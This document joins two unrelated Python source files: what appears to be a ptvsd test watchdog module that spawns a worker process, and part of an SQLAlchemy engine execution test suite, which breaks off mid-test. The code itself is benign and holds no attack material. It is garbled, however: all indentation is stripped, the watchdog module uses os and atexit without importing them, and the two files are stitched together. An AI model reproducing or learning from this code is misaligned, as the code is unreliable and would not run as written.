import psutil
import subprocess
import sys
import threading
import time
from ptvsd.common import fmt, log, messaging
from tests.watchdog import worker
WATCHDOG_TIMEOUT = 3
_name = fmt("watchdog-{0}", os.getpid())
_stream = None
_process = None
_worker_log_filename = None
def start():
global _stream, _process, _worker_log_filename
if _stream is not None:
return
args = [sys.executable, worker.__file__, str(os.getpid())]
log.info(
"Spawning {0} for tests-{1}:\n\n{2}",
_name,
os.getpid(),
"\n".join(repr(s) for s in args),
)
_process = psutil.Popen(
args, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
_stream = messaging.JsonIOStream(_process.stdout, _process.stdin, _name)
event, _worker_log_filename = _stream.read_json()
assert event == "watchdog"
atexit.register(stop)
def _dump_worker_log(command, problem, exc_info=None):
reason = fmt("{0}.{1}() {2}", _name, command, problem)
if _worker_log_filename is None:
reason += ", but there is no log."
else:
try:
with open(_worker_log_filename) as f:
worker_log = f.read()
except Exception:
reason += fmt(", but log {0} could not be retrieved.", _worker_log_filename)
else:
reason += fmt("; watchdog worker process log:\n\n{0}", worker_log)
if exc_info is None:
log.error("{0}", reason)
else:
log.exception("{0}", reason, exc_info=exc_info)
return reason
def _invoke(command, *args):
def timeout():
time.sleep(WATCHDOG_TIMEOUT)
if timeout.occurred is None:
reason = _dump_worker_log(command, "timed out")
timeout.occurred = reason
timeout.occurred = None
timeout_thread = threading.Thread(target=timeout)
timeout_thread.daemon = True
timeout_thread.start()
try:
try:
_stream.write_json([command] + list(args))
response = _stream.read_json()
assert response == ["ok"], fmt("{0} {1!r}", _name, response)
finally:
timeout.occurred = False
except Exception:
_dump_worker_log(command, "failed", sys.exc_info())
raise
else:
assert not timeout.occurred, str(timeout.occurred)
def stop():
if _stream is None:
return
try:
_invoke("stop")
_stream.close()
except Exception:
log.exception()
def register_spawn(pid, name):
if _stream is None:
start()
_invoke("register_spawn", pid, name)
def unregister_spawn(pid, name):
assert _stream is not None
_invoke("unregister_spawn", pid, name)
|
test_execute.py
|
# coding: utf-8
from contextlib import contextmanager
import re
import threading
import weakref
import sqlalchemy as tsa
from sqlalchemy import bindparam
from sqlalchemy import create_engine
from sqlalchemy import create_mock_engine
from sqlalchemy import event
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import INT
from sqlalchemy import Integer
from sqlalchemy import LargeBinary
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import Sequence
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import TypeDecorator
from sqlalchemy import util
from sqlalchemy import VARCHAR
from sqlalchemy.engine import default
from sqlalchemy.engine.base import Connection
from sqlalchemy.engine.base import Engine
from sqlalchemy.pool import NullPool
from sqlalchemy.pool import QueuePool
from sqlalchemy.sql import column
from sqlalchemy.sql import literal
from sqlalchemy.sql.elements import literal_column
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.assertions import expect_deprecated
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import picklers
from sqlalchemy.util import collections_abc
class SomeException(Exception):
pass
class Foo(object):
def __str__(self):
return "foo"
def __unicode__(self):
return util.u("fóó")
class ExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
)
def test_no_params_option(self):
stmt = (
"SELECT '%'"
+ testing.db.dialect.statement_compiler(
testing.db.dialect, None
).default_from()
)
with testing.db.connect() as conn:
result = (
conn.execution_options(no_parameters=True)
.exec_driver_sql(stmt)
.scalar()
)
eq_(result, "%")
def test_raw_positional_invalid(self, connection):
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) " "values (?, ?)",
[2, "fred"],
)
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) " "values (?, ?)",
[[3, "ed"], [4, "horse"]],
)
def test_raw_named_invalid(self, connection):
# this is awkward b.c. this is just testing if regular Python
# is raising TypeError if they happened to send arguments that
# look like the legacy ones which also happen to conflict with
# the positional signature for the method. some combinations
# can get through and fail differently
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 2, "name": "ed"},
{"id": 3, "name": "horse"},
{"id": 4, "name": "horse"},
)
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
id=4,
name="sally",
)
@testing.requires.qmark_paramstyle
def test_raw_qmark(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
(2, "fred"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
[(3, "ed"), (4, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
[(5, "barney"), (6, "donkey")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
(7, "sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "fred"),
(3, "ed"),
(4, "horse"),
(5, "barney"),
(6, "donkey"),
(7, "sally"),
]
res = conn.exec_driver_sql(
"select * from users where user_name=?", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.format_paramstyle
def test_raw_sprintf(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (%s, %s)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (%s, %s)",
[(2, "ed"), (3, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (%s, %s)",
(4, "sally"),
)
conn.exec_driver_sql("insert into users (user_id) values (%s)", (5,))
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
(5, None),
]
res = conn.exec_driver_sql(
"select * from users where user_name=%s", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.pyformat_paramstyle
def test_raw_python(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
dict(id=4, name="sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
@testing.requires.named_paramstyle
def test_raw_named(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (:id, :name)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (:id, :name)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (:id, :name)",
{"id": 4, "name": "sally"},
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
def test_non_dict_mapping(self, connection):
"""ensure arbitrary Mapping works for execute()"""
class NotADict(collections_abc.Mapping):
def __init__(self, _data):
self._data = _data
def __iter__(self):
return iter(self._data)
def __len__(self):
return len(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self):
return self._data.keys()
nd = NotADict({"a": 10, "b": 15})
eq_(dict(nd), {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer), bindparam("b", type_=Integer)
),
nd,
)
eq_(result.first(), (10, 15))
def test_row_works_as_mapping(self, connection):
"""ensure the RowMapping object works as a parameter dictionary for
execute."""
result = connection.execute(
select(literal(10).label("a"), literal(15).label("b"))
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer).label("a"),
bindparam("b", type_=Integer).label("b"),
),
row._mapping,
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
def test_dialect_has_table_assertion(self):
with expect_raises_message(
tsa.exc.ArgumentError,
r"The argument passed to Dialect.has_table\(\) should be a",
):
testing.db.dialect.has_table(testing.db, "some_table")
def test_exception_wrapping_dbapi(self):
with testing.db.connect() as conn:
# engine does not have exec_driver_sql
assert_raises_message(
tsa.exc.DBAPIError,
r"not_a_valid_statement",
conn.exec_driver_sql,
"not_a_valid_statement",
)
@testing.requires.sqlite
def test_exception_wrapping_non_dbapi_error(self):
e = create_engine("sqlite://")
e.dialect.is_disconnect = is_disconnect = Mock()
with e.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(
execute=Mock(
side_effect=TypeError("I'm not a DBAPI error")
)
)
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
eq_(is_disconnect.call_count, 0)
def test_exception_wrapping_non_standard_dbapi_error(self):
class DBAPIError(Exception):
pass
class OperationalError(DBAPIError):
pass
class NonStandardException(OperationalError):
pass
# TODO: this test is assuming too much of arbitrary dialects and would
# be better suited tested against a single mock dialect that does not
# have any special behaviors
with patch.object(
testing.db.dialect, "dbapi", Mock(Error=DBAPIError)
), patch.object(
testing.db.dialect, "is_disconnect", lambda *arg: False
), patch.object(
testing.db.dialect,
"do_execute",
Mock(side_effect=NonStandardException),
), patch.object(
testing.db.dialect.execution_ctx_cls,
"handle_dbapi_exception",
Mock(),
):
with testing.db.connect() as conn:
assert_raises(
tsa.exc.OperationalError, conn.exec_driver_sql, "select 1"
)
def test_exception_wrapping_non_dbapi_statement(self):
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise SomeException("nope")
def _go(conn):
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
with testing.db.connect() as conn:
_go(conn)
def test_not_an_executable(self):
for obj in (
Table("foo", MetaData(), Column("x", Integer)),
Column("x", Integer),
tsa.and_(True),
tsa.and_(True).compile(),
column("foo"),
column("foo").compile(),
select(1).cte(),
# select(1).subquery(),
MetaData(),
Integer(),
tsa.Index(name="foo"),
tsa.UniqueConstraint("x"),
):
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.ObjectNotExecutableError,
"Not an executable object",
conn.execute,
obj,
)
def test_subquery_exec_warning(self):
for obj in (select(1).alias(), select(1).subquery()):
with testing.db.connect() as conn:
with expect_deprecated(
"Executing a subquery object is deprecated and will "
"raise ObjectNotExecutableError"
):
eq_(conn.execute(obj).scalar(), 1)
def test_stmt_exception_bytestring_raised(self):
name = util.u("méil")
users = self.tables.users
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
util.u(
"A value is required for bind parameter 'uname'\n"
r".*SELECT users.user_name AS .m\xe9il."
)
if util.py2k
else util.u(
"A value is required for bind parameter 'uname'\n"
".*SELECT users.user_name AS .méil."
),
conn.execute,
select(users.c.user_name.label(name)).where(
users.c.user_name == bindparam("uname")
),
{"uname_incorrect": "foo"},
)
def test_stmt_exception_bytestring_utf8(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = util.u("some message méil").encode("utf-8")
err = tsa.exc.SQLAlchemyError(message)
if util.py2k:
# string passes it through
eq_(str(err), message)
# unicode accessor decodes to utf-8
eq_(unicode(err), util.u("some message méil")) # noqa F821
else:
eq_(str(err), util.u("some message méil"))
def test_stmt_exception_bytestring_latin1(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = util.u("some message méil").encode("latin-1")
err = tsa.exc.SQLAlchemyError(message)
if util.py2k:
# string passes it through
eq_(str(err), message)
# unicode accessor decodes to utf-8
eq_(unicode(err), util.u("some message m\\xe9il")) # noqa F821
else:
eq_(str(err), util.u("some message m\\xe9il"))
def test_stmt_exception_unicode_hook_unicode(self):
# uncommon case for Py2K, Unicode object passed
# as the error message
message = util.u("some message méil")
err = tsa.exc.SQLAlchemyError(message)
if util.py2k:
eq_(unicode(err), util.u("some message méil")) # noqa F821
else:
eq_(str(err), util.u("some message méil"))
def test_stmt_exception_object_arg(self):
err = tsa.exc.SQLAlchemyError(Foo())
eq_(str(err), "foo")
if util.py2k:
eq_(unicode(err), util.u("fóó")) # noqa F821
def test_stmt_exception_str_multi_args(self):
err = tsa.exc.SQLAlchemyError("some message", 206)
eq_(str(err), "('some message', 206)")
def test_stmt_exception_str_multi_args_bytestring(self):
message = util.u("some message méil").encode("utf-8")
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_str_multi_args_unicode(self):
message = util.u("some message méil")
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_pickleable_no_dbapi(self):
self._test_stmt_exception_pickleable(Exception("hello world"))
@testing.crashes(
"postgresql+psycopg2",
"Older versions don't support cursor pickling, newer ones do",
)
@testing.fails_on(
"mysql+oursql",
"Exception doesn't come back exactly the same from pickle",
)
@testing.fails_on(
"mysql+mysqlconnector",
"Exception doesn't come back exactly the same from pickle",
)
@testing.fails_on(
"oracle+cx_oracle",
"cx_oracle exception seems to be having " "some issue with pickling",
)
def test_stmt_exception_pickleable_plus_dbapi(self):
raw = testing.db.raw_connection()
the_orig = None
try:
try:
cursor = raw.cursor()
cursor.execute("SELECTINCORRECT")
except testing.db.dialect.dbapi.Error as orig:
# py3k has "orig" in local scope...
the_orig = orig
finally:
raw.close()
self._test_stmt_exception_pickleable(the_orig)
def _test_stmt_exception_pickleable(self, orig):
for sa_exc in (
tsa.exc.StatementError(
"some error",
"select * from table",
{"foo": "bar"},
orig,
False,
),
tsa.exc.InterfaceError(
"select * from table", {"foo": "bar"}, orig, True
),
tsa.exc.NoReferencedTableError("message", "tname"),
tsa.exc.NoReferencedColumnError("message", "tname", "cname"),
tsa.exc.CircularDependencyError(
"some message", [1, 2, 3], [(1, 2), (3, 4)]
),
):
for loads, dumps in picklers():
repickled = loads(dumps(sa_exc))
eq_(repickled.args[0], sa_exc.args[0])
if isinstance(sa_exc, tsa.exc.StatementError):
eq_(repickled.params, {"foo": "bar"})
eq_(repickled.statement, sa_exc.statement)
if hasattr(sa_exc, "connection_invalidated"):
eq_(
repickled.connection_invalidated,
sa_exc.connection_invalidated,
)
eq_(repickled.orig.args[0], orig.args[0])
def test_dont_wrap_mixin(self):
class MyException(Exception, tsa.exc.DontWrapMixin):
pass
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise MyException("nope")
def _go(conn):
assert_raises_message(
MyException,
"nope",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
conn = testing.db.connect()
try:
_go(conn)
finally:
conn.close()
def test_empty_insert(self, connection):
"""test that execute() interprets [] as a list with no params"""
users_autoinc = self.tables.users_autoinc
connection.execute(
users_autoinc.insert().values(user_name=bindparam("name", None)),
[],
)
eq_(connection.execute(users_autoinc.select()).fetchall(), [(1, None)])
@testing.only_on("sqlite")
def test_execute_compiled_favors_compiled_paramstyle(self):
users = self.tables.users
with patch.object(testing.db.dialect, "do_execute") as do_exec:
stmt = users.update().values(user_id=1, user_name="foo")
d1 = default.DefaultDialect(paramstyle="format")
d2 = default.DefaultDialect(paramstyle="pyformat")
with testing.db.begin() as conn:
conn.execute(stmt.compile(dialect=d1))
conn.execute(stmt.compile(dialect=d2))
eq_(
do_exec.mock_calls,
[
call(
mock.ANY,
"UPDATE users SET user_id=%s, user_name=%s",
(1, "foo"),
mock.ANY,
),
call(
mock.ANY,
"UPDATE users SET user_id=%(user_id)s, "
"user_name=%(user_name)s",
{"user_name": "foo", "user_id": 1},
mock.ANY,
),
],
)
@testing.requires.ad_hoc_engines
def test_engine_level_options(self):
eng = engines.testing_engine(
options={"execution_options": {"foo": "bar"}}
)
with eng.connect() as conn:
eq_(conn._execution_options["foo"], "bar")
eq_(
conn.execution_options(bat="hoho")._execution_options["foo"],
"bar",
)
eq_(
conn.execution_options(bat="hoho")._execution_options["bat"],
"hoho",
)
eq_(
conn.execution_options(foo="hoho")._execution_options["foo"],
"hoho",
)
eng.update_execution_options(foo="hoho")
conn = eng.connect()
eq_(conn._execution_options["foo"], "hoho")
@testing.requires.ad_hoc_engines
def test_generative_engine_execution_options(self):
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
is_(eng.engine, eng)
eng1 = eng.execution_options(foo="b1")
is_(eng1.engine, eng1)
eng2 = eng.execution_options(foo="b2")
eng1a = eng1.execution_options(bar="a1")
eng2a = eng2.execution_options(foo="b3", bar="a2")
is_(eng2a.engine, eng2a)
eq_(eng._execution_options, {"base": "x1"})
eq_(eng1._execution_options, {"base": "x1", "foo": "b1"})
eq_(eng2._execution_options, {"base": "x1", "foo": "b2"})
eq_(eng1a._execution_options, {"base": "x1", "foo": "b1", "bar": "a1"})
eq_(eng2a._execution_options, {"base": "x1", "foo": "b3", "bar": "a2"})
is_(eng1a.pool, eng.pool)
# test pool is shared
eng2.dispose()
is_(eng1a.pool, eng2.pool)
is_(eng.pool, eng2.pool)
@testing.requires.ad_hoc_engines
def test_autocommit_option_no_issue_first_connect(self):
eng = create_engine(testing.db.url)
eng.update_execution_options(autocommit=True)
conn = eng.connect()
eq_(conn._execution_options, {"autocommit": True})
conn.close()
def test_initialize_rollback(self):
"""test a rollback happens during first connect"""
eng = create_engine(testing.db.url)
with patch.object(eng.dialect, "do_rollback") as do_rollback:
assert do_rollback.call_count == 0
connection = eng.connect()
assert do_rollback.call_count == 1
connection.close()
@testing.requires.ad_hoc_engines
def test_dialect_init_uses_options(self):
eng = create_engine(testing.db.url)
def my_init(connection):
connection.execution_options(foo="bar").execute(select(1))
with patch.object(eng.dialect, "initialize", my_init):
conn = eng.connect()
eq_(conn._execution_options, {})
conn.close()
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch_hasevents(self):
def l1(*arg, **kw):
pass
eng = create_engine(testing.db.url)
assert not eng._has_events
event.listen(eng, "before_execute", l1)
eng2 = eng.execution_options(foo="bar")
assert eng2._has_events
def test_works_after_dispose(self):
eng = create_engine(testing.db.url)
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_works_after_dispose_testing_engine(self):
eng = engines.testing_engine()
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_scalar(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalar(select(users.c.user_name).order_by(users.c.user_id))
eq_(res, "sandy")
def test_scalars(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalars(select(users.c.user_name).order_by(users.c.user_id))
eq_(res.all(), ["sandy", "spongebob"])
class UnicodeReturnsTest(fixtures.TestBase):
@testing.requires.python3
def test_unicode_test_not_in_python3(self):
eng = engines.testing_engine()
eng.dialect.returns_unicode_strings = String.RETURNS_UNKNOWN
assert_raises_message(
tsa.exc.InvalidRequestError,
"RETURNS_UNKNOWN is unsupported in Python 3",
eng.connect,
)
@testing.requires.python2
def test_unicode_test_fails_warning(self):
class MockCursor(engines.DBAPIProxyCursor):
def execute(self, stmt, params=None, **kw):
if "test unicode returns" in stmt:
raise self.engine.dialect.dbapi.DatabaseError("boom")
else:
return super(MockCursor, self).execute(stmt, params, **kw)
eng = engines.proxying_engine(cursor_cls=MockCursor)
with testing.expect_warnings(
"Exception attempting to detect unicode returns"
):
eng.connect()
# because plain varchar passed, we don't know the correct answer
eq_(eng.dialect.returns_unicode_strings, String.RETURNS_CONDITIONAL)
eng.dispose()
class ConvenienceExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
cls.table = Table(
"exec_test",
metadata,
Column("a", Integer),
Column("b", Integer),
test_needs_acid=True,
)
def _trans_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
return go
def _trans_rollback_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
raise SomeException("breakage")
return go
def _assert_no_data(self):
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count("*")).select_from(self.table)),
0,
)
def _assert_fn(self, x, value=None):
with testing.db.connect() as conn:
eq_(conn.execute(self.table.select()).fetchall(), [(x, value)])
def test_transaction_engine_ctx_commit(self):
fn = self._trans_fn()
ctx = testing.db.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_engine_ctx_begin_fails_dont_enter_enter(self):
"""test #7272"""
engine = engines.testing_engine()
mock_connection = Mock(
return_value=Mock(begin=Mock(side_effect=Exception("boom")))
)
with mock.patch.object(engine, "_connection_cls", mock_connection):
if testing.requires.legacy_engine.enabled:
with expect_raises_message(Exception, "boom"):
engine.begin()
else:
# context manager isn't entered, doesn't actually call
# connect() or connection.begin()
engine.begin()
if testing.requires.legacy_engine.enabled:
eq_(mock_connection.return_value.close.mock_calls, [call()])
else:
eq_(mock_connection.return_value.close.mock_calls, [])
def test_transaction_engine_ctx_begin_fails_include_enter(self):
"""test #7272"""
engine = engines.testing_engine()
close_mock = Mock()
with mock.patch.object(
engine._connection_cls,
"begin",
Mock(side_effect=Exception("boom")),
), mock.patch.object(engine._connection_cls, "close", close_mock):
with expect_raises_message(Exception, "boom"):
with engine.begin():
pass
eq_(close_mock.mock_calls, [call()])
def test_transaction_engine_ctx_rollback(self):
fn = self._trans_rollback_fn()
ctx = testing.db.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
def test_transaction_connection_ctx_commit(self):
fn = self._trans_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_connection_ctx_rollback(self):
fn = self._trans_rollback_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
def test_connection_as_ctx(self):
fn = self._trans_fn()
with testing.db.begin() as conn:
fn(conn, 5, value=8)
self._assert_fn(5, value=8)
@testing.fails_on("mysql+oursql", "oursql bug ? getting wrong rowcount")
@testing.requires.legacy_engine
def test_connect_as_ctx_noautocommit(self):
fn = self._trans_fn()
self._assert_no_data()
with testing.db.connect() as conn:
ctx = conn.execution_options(autocommit=False)
testing.run_as_contextmanager(ctx, fn, 5, value=8)
# autocommit is off
self._assert_no_data()
class FutureConvenienceExecuteTest(
fixtures.FutureEngineMixin, ConvenienceExecuteTest
):
__backend__ = True
class CompiledCacheTest(fixtures.TestBase):
__backend__ = True
def test_cache(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
conn = connection
cache = {}
cached_conn = conn.execution_options(compiled_cache=cache)
ins = users.insert()
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"user_name": "u1"})
cached_conn.execute(ins, {"user_name": "u2"})
cached_conn.execute(ins, {"user_name": "u3"})
eq_(compile_mock.call_count, 1)
assert len(cache) == 1
eq_(conn.exec_driver_sql("select count(*) from users").scalar(), 3)
@testing.only_on(
["sqlite", "mysql", "postgresql"],
"uses blob value that is problematic for some DBAPIs",
)
def test_cache_noleak_on_statement_values(self, metadata, connection):
# This is a non regression test for an object reference leak caused
# by the compiled_cache.
photo = Table(
"photo",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("photo_blob", LargeBinary()),
)
metadata.create_all(connection)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
class PhotoBlob(bytearray):
pass
blob = PhotoBlob(100)
ref_blob = weakref.ref(blob)
ins = photo.insert()
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"photo_blob": blob})
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
eq_(
connection.exec_driver_sql("select count(*) from photo").scalar(),
1,
)
del blob
gc_collect()
# The compiled statement cache should not hold any reference to the
# the statement values (only the keys).
eq_(ref_blob(), None)
def test_keys_independent_of_ordering(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
connection.execute(
users.insert(),
{"user_id": 1, "user_name": "u1", "extra_data": "e1"},
)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
upd = users.update().where(users.c.user_id == bindparam("b_user_id"))
with patch.object(
upd, "_compiler", Mock(side_effect=upd._compiler)
) as compile_mock:
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("user_name", "u2"),
("extra_data", "e2"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("extra_data", "e3"),
("user_name", "u3"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("extra_data", "e4"),
("user_name", "u4"),
("b_user_id", 1),
]
),
)
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
@testing.requires.schemas
def test_schema_translate_in_key(self, metadata, connection):
Table("x", metadata, Column("q", Integer))
Table("x", metadata, Column("q", Integer), schema=config.test_schema)
metadata.create_all(connection)
m = MetaData()
t1 = Table("x", m, Column("q", Integer))
ins = t1.insert()
stmt = select(t1.c.q)
cache = {}
conn = connection.execution_options(compiled_cache=cache)
conn.execute(ins, {"q": 1})
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: config.test_schema},
)
conn.execute(ins, {"q": 2})
eq_(conn.scalar(stmt), 2)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: None},
)
# should use default schema again even though statement
# was compiled with test_schema in the map
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
)
eq_(conn.scalar(stmt), 1)
class MockStrategyTest(fixtures.TestBase):
def _engine_fixture(self):
buf = util.StringIO()
def dump(sql, *multiparams, **params):
buf.write(util.text_type(sql.compile(dialect=engine.dialect)))
engine = create_mock_engine("postgresql://", executor=dump)
return engine, buf
def test_sequence_not_duped(self):
engine, buf = self._engine_fixture()
metadata = MetaData()
t = Table(
"testtable",
metadata,
Column(
"pk",
Integer,
Sequence("testtable_pk_seq"),
primary_key=True,
),
)
t.create(engine)
t.drop(engine)
eq_(re.findall(r"CREATE (\w+)", buf.getvalue()), ["SEQUENCE", "TABLE"])
eq_(re.findall(r"DROP (\w+)", buf.getvalue()), ["TABLE", "SEQUENCE"])
class SchemaTranslateTest(fixtures.TestBase, testing.AssertsExecutionResults):
__requires__ = ("schemas",)
__backend__ = True
@testing.fixture
def plain_tables(self, metadata):
t1 = Table(
"t1", metadata, Column("x", Integer), schema=config.test_schema
)
t2 = Table(
"t2", metadata, Column("x", Integer), schema=config.test_schema
)
t3 = Table("t3", metadata, Column("x", Integer), schema=None)
return t1, t2, t3
def test_create_table(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
t1.create(conn)
t2.create(conn)
t3.create(conn)
t3.drop(conn)
t2.drop(conn)
t1.drop(conn)
asserter.assert_(
CompiledSQL("CREATE TABLE __[SCHEMA__none].t1 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_foo].t2 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_bar].t3 (x INTEGER)"),
CompiledSQL("DROP TABLE __[SCHEMA_bar].t3"),
CompiledSQL("DROP TABLE __[SCHEMA_foo].t2"),
CompiledSQL("DROP TABLE __[SCHEMA__none].t1"),
)
def test_ddl_hastable(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
